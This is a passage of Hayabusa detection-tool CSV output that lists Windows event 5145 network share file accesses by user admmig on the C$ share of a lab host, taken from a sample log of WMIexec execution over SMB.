0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.537 